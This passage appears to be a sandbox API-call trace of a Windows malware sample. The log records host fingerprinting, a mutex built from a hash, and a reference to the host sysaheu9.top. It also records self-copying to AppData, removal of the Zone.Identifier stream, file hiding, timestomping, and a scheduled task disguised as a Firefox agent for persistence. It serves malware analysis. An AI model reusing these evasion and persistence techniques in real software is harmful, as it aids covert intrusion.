(dwMilliseconds=0xa) [0186.215] Sleep (dwMilliseconds=0xa) [0186.227] Sleep (dwMilliseconds=0xa) [0186.240] Sleep (dwMilliseconds=0xa) [0186.253] Sleep (dwMilliseconds=0xa) [0186.266] Sleep (dwMilliseconds=0xa) [0186.295] Sleep (dwMilliseconds=0xa) [0186.457] Sleep (dwMilliseconds=0xa) [0186.542] Sleep (dwMilliseconds=0xa) [0186.643] Sleep (dwMilliseconds=0xa) [0186.690] Sleep (dwMilliseconds=0xa) [0186.734] Sleep (dwMilliseconds=0xa) [0186.770] Sleep (dwMilliseconds=0xa) [0186.811] Sleep (dwMilliseconds=0xa) [0186.839] Sleep (dwMilliseconds=0xa) [0186.854] Sleep (dwMilliseconds=0xa) [0186.898] Sleep (dwMilliseconds=0xa) [0186.935] Sleep (dwMilliseconds=0xa) [0187.009] Sleep (dwMilliseconds=0xa) [0187.048] Sleep (dwMilliseconds=0xa) [0187.086] Sleep (dwMilliseconds=0xa) [0187.125] Sleep (dwMilliseconds=0xa) [0187.163] Sleep (dwMilliseconds=0xa) [0187.207] Sleep (dwMilliseconds=0xa) [0187.251] Sleep (dwMilliseconds=0xa) [0187.275] Sleep (dwMilliseconds=0xa) [0187.320] Sleep (dwMilliseconds=0xa) [0187.366] Sleep (dwMilliseconds=0xa) [0187.415] Sleep (dwMilliseconds=0xa) [0187.455] Sleep (dwMilliseconds=0xa) [0187.495] Sleep (dwMilliseconds=0xa) [0187.629] Sleep (dwMilliseconds=0xa) [0187.669] Sleep (dwMilliseconds=0xa) [0187.705] Sleep (dwMilliseconds=0xa) [0187.733] Sleep (dwMilliseconds=0xa) [0187.748] Sleep (dwMilliseconds=0xa) [0187.770] Sleep (dwMilliseconds=0xa) [0187.786] Sleep (dwMilliseconds=0xa) [0187.821] Sleep (dwMilliseconds=0xa) [0187.899] Sleep (dwMilliseconds=0xa) [0187.992] Sleep (dwMilliseconds=0xa) [0188.051] Sleep (dwMilliseconds=0xa) [0188.093] Sleep (dwMilliseconds=0xa) [0188.131] Sleep (dwMilliseconds=0xa) [0188.176] Sleep (dwMilliseconds=0xa) [0188.218] Sleep (dwMilliseconds=0xa) [0188.231] Sleep (dwMilliseconds=0xa) [0188.243] Sleep (dwMilliseconds=0xa) [0188.256] Sleep (dwMilliseconds=0xa) [0188.271] Sleep (dwMilliseconds=0xa) [0188.300] Sleep (dwMilliseconds=0xa) [0188.333] Sleep (dwMilliseconds=0xa) [0188.427] Sleep (dwMilliseconds=0xa) [0188.527] Sleep (dwMilliseconds=0xa) [0188.607] Sleep (dwMilliseconds=0xa) [0188.665] Sleep (dwMilliseconds=0xa) [0188.706] Sleep (dwMilliseconds=0xa) [0188.783] Sleep (dwMilliseconds=0xa) [0188.808] Sleep (dwMilliseconds=0xa) [0188.824] Sleep (dwMilliseconds=0xa) [0188.839] Sleep (dwMilliseconds=0xa) [0188.851] Sleep (dwMilliseconds=0xa) [0188.869] Sleep (dwMilliseconds=0xa) [0188.880] Sleep (dwMilliseconds=0xa) [0188.912] Sleep (dwMilliseconds=0xa) [0188.984] Sleep (dwMilliseconds=0xa) [0189.062] Sleep (dwMilliseconds=0xa) [0189.165] Sleep (dwMilliseconds=0xa) [0189.255] Sleep (dwMilliseconds=0xa) [0189.302] Sleep (dwMilliseconds=0xa) [0189.369] Sleep (dwMilliseconds=0xa) [0189.410] Sleep (dwMilliseconds=0xa) [0189.427] Sleep (dwMilliseconds=0xa) [0189.440] Sleep (dwMilliseconds=0xa) [0189.452] Sleep (dwMilliseconds=0xa) [0189.476] Sleep (dwMilliseconds=0xa) [0189.510] Sleep (dwMilliseconds=0xa) [0189.538] Sleep (dwMilliseconds=0xa) [0189.616] Sleep (dwMilliseconds=0xa) [0189.711] Sleep (dwMilliseconds=0xa) [0189.751] Sleep (dwMilliseconds=0xa) [0189.791] Sleep (dwMilliseconds=0xa) [0189.831] Sleep (dwMilliseconds=0xa) [0189.871] Sleep (dwMilliseconds=0xa) [0190.002] Sleep (dwMilliseconds=0xa) [0190.024] Sleep (dwMilliseconds=0xa) [0190.038] Sleep (dwMilliseconds=0xa) [0190.051] Sleep (dwMilliseconds=0xa) [0190.065] Sleep (dwMilliseconds=0xa) [0190.077] Sleep (dwMilliseconds=0xa) [0190.109] Sleep (dwMilliseconds=0xa) [0190.143] Sleep (dwMilliseconds=0xa) [0190.220] Sleep (dwMilliseconds=0xa) [0190.370] Sleep (dwMilliseconds=0xa) [0190.471] Sleep (dwMilliseconds=0xa) [0190.510] Sleep (dwMilliseconds=0xa) [0190.550] Sleep (dwMilliseconds=0xa) [0190.593] Sleep (dwMilliseconds=0xa) [0190.611] Sleep (dwMilliseconds=0xa) [0190.623] Sleep (dwMilliseconds=0xa) [0190.637] Sleep (dwMilliseconds=0xa) [0190.679] Sleep (dwMilliseconds=0xa) [0190.704] Sleep (dwMilliseconds=0xa) [0190.768] Sleep (dwMilliseconds=0xa) [0191.013] Sleep (dwMilliseconds=0xa) [0191.627] Sleep (dwMilliseconds=0xa) [0192.054] Sleep (dwMilliseconds=0xa) [0192.125] Sleep (dwMilliseconds=0xa) [0192.183] Sleep (dwMilliseconds=0xa) [0192.196] Sleep (dwMilliseconds=0xa) [0192.219] Sleep (dwMilliseconds=0xa) [0192.249] Sleep (dwMilliseconds=0xa) [0192.269] Sleep (dwMilliseconds=0xa) [0192.313] Sleep (dwMilliseconds=0xa) [0192.392] Sleep (dwMilliseconds=0xa) [0192.432] Sleep (dwMilliseconds=0xa) [0192.481] Sleep (dwMilliseconds=0xa) [0192.565] Sleep (dwMilliseconds=0xa) [0192.637] Sleep (dwMilliseconds=0xa) [0192.682] Sleep (dwMilliseconds=0xa) [0192.722] Sleep (dwMilliseconds=0xa) [0192.788] Sleep (dwMilliseconds=0xa) [0192.812] Sleep (dwMilliseconds=0xa) [0192.858] Sleep (dwMilliseconds=0xa) [0192.889] Sleep (dwMilliseconds=0xa) [0192.946] Sleep (dwMilliseconds=0xa) [0192.988] Sleep (dwMilliseconds=0xa) [0193.049] Sleep (dwMilliseconds=0xa) [0193.099] Sleep (dwMilliseconds=0xa) [0193.165] GetSystemDirectoryA (in: lpBuffer=0x1026fde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0193.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" [0193.166] RtlGetVersion (in: lpVersionInformation=0x2830457 | out: lpVersionInformation=0x2830457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0193.166] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1026fdc8 | out: TokenHandle=0x1026fdc8*=0x1230) returned 1 [0193.166] GetTokenInformation (in: TokenHandle=0x1230, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1026fdc0 | out: TokenInformation=0x0, ReturnLength=0x1026fdc0) returned 0 [0193.166] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x25) returned 0x7d40830 [0193.166] GetTokenInformation (in: TokenHandle=0x1230, TokenInformationClass=0x19, TokenInformation=0x7d40830, TokenInformationLength=0x1c, ReturnLength=0x1026fdc0 | out: TokenInformation=0x7d40830, ReturnLength=0x1026fdc0) returned 1 [0193.166] GetSidSubAuthorityCount (pSid=0x7d40840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x7d40841 [0193.166] GetSidSubAuthority (pSid=0x7d40840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x7d40848 [0193.166] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x25 [0193.166] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0193.166] CloseHandle (hObject=0x1230) returned 1 [0193.166] GetComputerNameA (in: lpBuffer=0x1026fe90, nSize=0x1026fed0 | out: lpBuffer="XC64ZB", nSize=0x1026fed0) returned 1 [0193.167] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1026fec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1026fec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x29) returned 0x7d40830 [0193.167] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x14) returned 0x7d40870 [0193.167] wsprintfA (in: param_1=0x7d40830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0193.170] CryptAcquireContextA (in: phProv=0x1026fe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1026fe18*=0x8799280) returned 1 [0193.202] CryptCreateHash (in: hProv=0x8799280, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x1026fe10 | out: phHash=0x1026fe10) returned 1 [0193.203] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0193.203] CryptHashData (hHash=0xac012a0, pbData=0x7d40830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0193.203] CryptGetHashParam (in: hHash=0xac012a0, dwParam=0x2, pbData=0x1026fe20, pdwDataLen=0x1026fe50, dwFlags=0x0 | out: pbData=0x1026fe20, pdwDataLen=0x1026fe50) returned 1 [0193.203] wsprintfA (in: param_1=0x283020c, param_2="%02X" | out: param_1="FE") returned 2 [0193.203] wsprintfA (in: param_1=0x283020e, param_2="%02X" | out: param_1="7F") returned 2 [0193.203] wsprintfA (in: param_1=0x2830210, param_2="%02X" | out: param_1="15") returned 2 [0193.203] wsprintfA (in: param_1=0x2830212, param_2="%02X" | out: param_1="06") returned 2 [0193.203] wsprintfA (in: param_1=0x2830214, param_2="%02X" | out: param_1="0B") returned 2 [0193.203] wsprintfA (in: param_1=0x2830216, param_2="%02X" | out: param_1="87") returned 2 [0193.203] wsprintfA (in: param_1=0x2830218, param_2="%02X" | out: param_1="5F") returned 2 [0193.203] wsprintfA (in: param_1=0x283021a, param_2="%02X" | out: param_1="B9") returned 2 [0193.203] wsprintfA (in: param_1=0x283021c, param_2="%02X" | out: param_1="FB") returned 2 [0193.203] wsprintfA (in: param_1=0x283021e, param_2="%02X" | out: param_1="2A") returned 2 [0193.204] wsprintfA (in: param_1=0x2830220, param_2="%02X" | out: param_1="49") returned 2 [0193.204] wsprintfA (in: param_1=0x2830222, param_2="%02X" | out: param_1="F0") returned 2 [0193.204] wsprintfA (in: param_1=0x2830224, param_2="%02X" | out: param_1="8D") returned 2 [0193.204] wsprintfA (in: param_1=0x2830226, param_2="%02X" | out: param_1="5D") returned 2 [0193.204] wsprintfA (in: param_1=0x2830228, param_2="%02X" | out: param_1="03") returned 2 [0193.204] wsprintfA (in: param_1=0x283022a, param_2="%02X" | out: param_1="12") returned 2 [0193.204] CryptDestroyHash (hHash=0xac012a0) returned 1 [0193.204] CryptReleaseContext (hProv=0x8799280, dwFlags=0x0) returned 1 [0193.204] wsprintfA (in: param_1=0x283022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0193.204] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40870) returned 0x14 [0193.204] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40870) returned 1 [0193.205] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x29 [0193.205] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0xe) returned 0x7d40830 [0193.206] wsprintfA (in: param_1=0x2830dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0193.206] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0xe [0193.206] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0193.206] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x1230 [0193.206] RtlGetLastWin32Error () returned 0x0 [0193.206] GetTickCount () returned 0x201be01 [0193.206] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1008) returned 0x7d40830 [0193.206] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x2e) returned 0x7d41840 [0193.206] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1026fed8 | out: phkResult=0x1026fed8*=0x14a8) returned 0x0 [0193.206] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x14) returned 0x7d41880 [0193.207] RegQueryValueExA (in: hKey=0x14a8, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x1026fe60, lpcbData=0x1026fec0*=0x20 | out: lpType=0x0, lpData=0x1026fe60*=0x31, lpcbData=0x1026fec0*=0xd) returned 0x0 [0193.207] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41880) returned 0x14 [0193.207] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41880) returned 1 [0193.207] lstrlenA (lpString="11.0.10586.0") returned 12 [0193.207] lstrlenA (lpString=".") returned 1 [0193.207] atoi (_Str="11") returned 11 [0193.207] RegCloseKey (hKey=0x14a8) returned 0x0 [0193.207] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x2e [0193.207] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.207] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x7d40830, cbSize=0x1026fec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x1026fec0) returned 0x0 [0193.373] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0193.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7d40830, cbMultiByte=75, lpWideCharStr=0x2830577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0193.373] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d40830) returned 0x1008 [0193.373] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d40830) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1008) returned 0x7d40830 [0193.373] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1c) returned 0x7d41840 [0193.373] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x7d40830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0193.373] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x1c [0193.374] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x16) returned 0x7d41840 [0193.374] wsprintfW (in: param_1=0x28307a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0193.374] wsprintfW (in: param_1=0x2830bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0193.374] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x16 [0193.374] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1d) returned 0x7d41840 [0193.374] lstrlenA (lpString="http://sysaheu9.top/") returned 20 [0193.374] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x7d41840, Length=0x14) returned 0x90aae82c [0193.374] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x1d [0193.374] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.374] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0193.375] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0193.375] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0193.401] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe")) returned 1 [0193.560] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d41840 [0193.560] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x2a) returned 0x7d41860 [0193.560] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x408) returned 0x7d418a0 [0193.560] wsprintfW (in: param_1=0x7d418a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0193.560] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0193.561] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d418a0) returned 0x408 [0193.561] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d418a0) returned 1 [0193.561] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x12 [0193.561] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.561] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41860) returned 0x2a [0193.561] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41860) returned 1 [0193.561] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x16) returned 0x7d41840 [0193.561] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x210) returned 0x7d41860 [0193.561] GetSystemDirectoryA (in: lpBuffer=0x7d41860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0193.561] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0193.561] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0193.561] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0193.562] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x14b8 [0193.562] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x1026fe30 | out: lpFileInformation=0x1026fe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0193.562] SetFileTime (hFile=0x14b8, lpCreationTime=0x1026fe34, lpLastAccessTime=0x1026fe3c, lpLastWriteTime=0x1026fe44) returned 1 [0193.562] CloseHandle (hObject=0x14b8) returned 1 [0193.563] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41860) returned 0x210 [0193.563] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41860) returned 1 [0193.563] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x16 [0193.563] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0193.563] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x418) returned 0x7d41840 [0193.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0193.563] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x212) returned 0x7d41c60 [0193.563] GetUserNameW (in: lpBuffer=0x7d41c60, pcbBuffer=0x1026fe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1026fe70) returned 1 [0193.570] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10d) returned 0x7d41e80 [0193.570] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x4c) returned 0x7d41fa0 [0193.574] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10d) returned 0x7d42000 [0193.574] wsprintfW (in: param_1=0x7d41e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0193.575] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d42000) returned 0x10d [0193.575] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d42000) returned 1 [0193.575] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41fa0) returned 0x4c [0193.575] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41fa0) returned 1 [0193.575] CoCreateInstance (in: rclsid=0x2841010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2841000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x1026fd08 | out: ppv=0x1026fd08*=0x3d6e150) returned 0x0 [0194.092] TaskScheduler:ITaskService:Connect (This=0x3d6e150, serverName=0x1026fd80*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), user=0x1026fda0*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), domain=0x1026fd60*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), password=0x1026fde0*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6)) returned 0x0 [0194.344] TaskScheduler:ITaskService:GetFolder (in: This=0x3d6e150, Path="", ppFolder=0x1026fd28 | out: ppFolder=0x1026fd28*=0x3d4db20) returned 0x0 [0194.346] ITaskFolder:DeleteTask (This=0x3d4db20, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0194.347] TaskScheduler:ITaskService:NewTask (in: This=0x3d6e150, flags=0x0, ppDefinition=0x1026fe40 | out: ppDefinition=0x1026fe40*=0x3d41170) returned 0x0 [0194.348] ITaskDefinition:get_RegistrationInfo (in: This=0x3d41170, ppRegistrationInfo=0x1026fd40 | out: ppRegistrationInfo=0x1026fd40*=0x3cecd60) returned 0x0 [0194.348] IRegistrationInfo:put_Author (This=0x3cecd60, Author="RDhJ0CNFevzX") returned 0x0 [0194.348] IUnknown:Release (This=0x3cecd60) returned 0x1 [0194.348] ITaskDefinition:get_Settings (in: This=0x3d41170, ppSettings=0x1026fd18 | out: ppSettings=0x1026fd18*=0x3ced7e0) returned 0x0 [0194.348] ITaskSettings:put_StartWhenAvailable (This=0x3ced7e0, StartWhenAvailable=1) returned 0x0 [0194.348] IUnknown:Release (This=0x3ced7e0) returned 0x3 [0194.348] ITaskDefinition:get_Triggers (in: This=0x3d41170, ppTriggers=0x1026fd20 | out: ppTriggers=0x1026fd20*=0x3cfba20) returned 0x0 [0194.348] ITriggerCollection:Create (in: This=0x3cfba20, Type=1, ppTrigger=0x1026fe30 | out: ppTrigger=0x1026fe30*=0x3d41f80) returned 0x0 [0194.349] IUnknown:QueryInterface (in: This=0x3d41f80, riid=0x2841030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x1026fd10 | out: ppvObject=0x1026fd10*=0x3d41f80) returned 0x0 [0194.349] ITrigger:get_Repetition (in: This=0x3d41f80, ppRepeat=0x1026fd00 | out: ppRepeat=0x1026fd00*=0x3d4bb60) returned 0x0 [0194.349] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x14) returned 0x7d41fa0 [0194.349] IRepetitionPattern:put_Interval (This=0x3d4bb60, Interval="PT10M") returned 0x0 [0194.349] ITrigger:put_Repetition (This=0x3d41f80, Repetition=0x3d4bb60) returned 0x0 [0194.349] IUnknown:Release (This=0x3d4bb60) returned 0x1 [0194.349] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x30) returned 0x7d41fc0 [0194.349] ITrigger:put_StartBoundary (This=0x3d41f80, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0194.349] IUnknown:Release (This=0x3d41f80) returned 0x2 [0194.349] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41fc0) returned 0x30 [0194.349] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41fc0) returned 1 [0194.349] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41fa0) returned 0x14 [0194.349] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41fa0) returned 1 [0194.349] IUnknown:Release (This=0x3d41f80) returned 0x1 [0194.349] ITriggerCollection:Create (in: This=0x3cfba20, Type=9, ppTrigger=0x1026fe30 | out: 